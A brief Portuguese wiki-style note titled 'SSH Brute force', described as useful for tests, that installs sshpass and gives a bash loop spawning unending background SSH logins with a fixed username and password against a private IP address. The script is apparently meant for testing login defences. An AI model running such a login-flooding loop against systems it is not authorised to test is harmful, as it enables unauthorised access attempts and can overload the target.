====== SSH Brute force ====== O script faz varias tentativas de login, Ăștil para testes. # apt -y install sshpass # vi sshbrute.sh #!/usr/bin/env bash while true; do sshpass -p nobody ssh -n -T -o StrictHostKeyChecking=no nobody@192.168.68.11 & sleep 0.1 done